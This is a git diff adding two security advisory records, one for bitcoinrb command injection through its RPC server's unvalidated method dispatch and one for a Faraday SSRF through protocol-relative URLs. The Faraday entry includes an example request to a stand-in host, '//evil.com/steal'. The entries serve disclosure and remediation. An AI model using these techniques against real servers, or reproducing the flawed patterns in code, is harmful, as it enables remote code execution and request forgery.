diff --git a/gems/bitcoinrb/GHSA-q66h-m87m-j2q6.yml b/gems/bitcoinrb/GHSA-q66h-m87m-j2q6.yml new file mode 100644 index 0000000000..45ab6ace02 --- /dev/null +++ b/gems/bitcoinrb/GHSA-q66h-m87m-j2q6.yml @@ -0,0 +1,45 @@ +--- +gem: bitcoinrb +ghsa: q66h-m87m-j2q6 +url: https://github.com/chaintope/bitcoinrb/security/advisories/GHSA-q66h-m87m-j2q6 +title: Bitcoinrb Vulnerable to Command injection via RPC +date: 2026-02-10 +description: | + ### Summary: Remote Code Execution + + Unsafe handling of request parameters in the RPC HTTP server + results in command injection. + + ### Details + + In lib/bitcoin/rpc/http_server.rb line 30-39, the JSON body of a + POST request is parsed into `command` and `args` variables. These + values are then passed to `send`, which is used to call an arbitrary + class method. However, there is no validation that the provided + `command` value is one of the expected RPC methods. + This means that an attacker could supply a `command` value such + as `system`, and then pass arbitrary system commands into the + `args` parameter and achieve remote code execution. + + ### Remediation + + **Mitigating Factors:** + + - The RPC server is part of the experimental SPV node feature, + which is not documented and has very few users. + - The SPV-related features may be removed in future releases. + + **Resolution:** + + - Added whitelist validation to allow only RPC methods defined + in `RequestHandler`. + + - Fixed in version 1.12.0. +patched_versions: + - ">= 1.12.0" +related: + url: + - https://github.com/chaintope/bitcoinrb/releases/tag/v1.12.0 + - https://github.com/chaintope/bitcoinrb/security/advisories/GHSA-q66h-m87m-j2q6 + - https://github.com/chaintope/bitcoinrb/commit/070327133a2a3e5a6d265b2d82f06f9414c01e74 + - https://github.com/advisories/GHSA-q66h-m87m-j2q6 diff --git a/gems/faraday/CVE-2026-25765.yml b/gems/faraday/CVE-2026-25765.yml new file mode 100644 index 0000000000..0dd0f85f48 --- /dev/null +++ b/gems/faraday/CVE-2026-25765.yml @@ -0,0 +1,75 @@ +--- +gem: faraday +cve: 2026-25765 +ghsa: 33mh-2634-fwr2 +url: https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2 +title: Faraday affected by SSRF via protocol-relative URL host + override in build_exclusive_url +date: 2026-02-09 +description: | + ### Impact + + Faraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`) + uses Ruby's `URI#merge` to combine the connection's base URL with + a user-supplied path. Per RFC 3986, protocol-relative URLs + (e.g. `//evil.com/path`) are treated as network-path references + that override the base URL's host/authority component. + + This means that if any application passes user-controlled input to + Faraday's `get()`, `post()`, `build_url()`, or other request + methods, an attacker can supply a protocol-relative URL like + `//attacker.com/endpoint` to redirect the request to an + arbitrary host, enabling Server-Side Request Forgery (SSRF). + + The `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts + URLs starting with `/`, so protocol-relative URLs bypass it entirely. + + **Example** + ```ruby + conn = Faraday.new(url: 'https://api.internal.com') + conn.get('//evil.com/steal') + # Request is sent to https://evil.com/steal instead of api.internal.com + ``` + + ### Patches + + Faraday v2.14.1 is patched against this security issue. All + versions of Faraday up to 2.14.0 are affected. + + ### Workarounds + + **NOTE: Upgrading to Faraday v2.14.1+ is the recommended action + to mitigate this issue, however should that not be an option + please continue reading.** + + Applications should validate and sanitize any user-controlled + input before passing it to Faraday request methods. + Specifically: + + - Reject or strip input that starts with // followed by a + non-/ character. + - Use an allowlist of permitted path prefixes. + - Alternatively, prepend ./ to all user-supplied paths before + passing them to Faraday. + + Example validation: + ```ruby + def safe_path(user_input) + raise ArgumentError, "Invalid path" if user_input.match?(r{\A//[^/]}) + user_input + end + ``` +cvss_v3: 5.8 +patched_versions: + - ">= 2.14.1" +related: + url: + - https://nvd.nist.gov/vuln/detail/CVE-2026-25765 + - https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2 + - https://github.com/lostisland/faraday/releases/tag/v2.14.1 + - https://github.com/lostisland/faraday/pull/1569 + - https://github.com/lostisland/faraday/commit/a6d3a3a0bf59c2ab307d0abd91bc126aef5561bc + - https://www.rfc-editor.org/rfc/rfc3986#section-5.2.2 + - https://www.rfc-editor.org/rfc/rfc3986#section-5.4 + - https://advisories.gitlab.com/pkg/gem/faraday/CVE-2026-25765 + - https://github.com/advisories/GHSA-33mh-2634-fwr2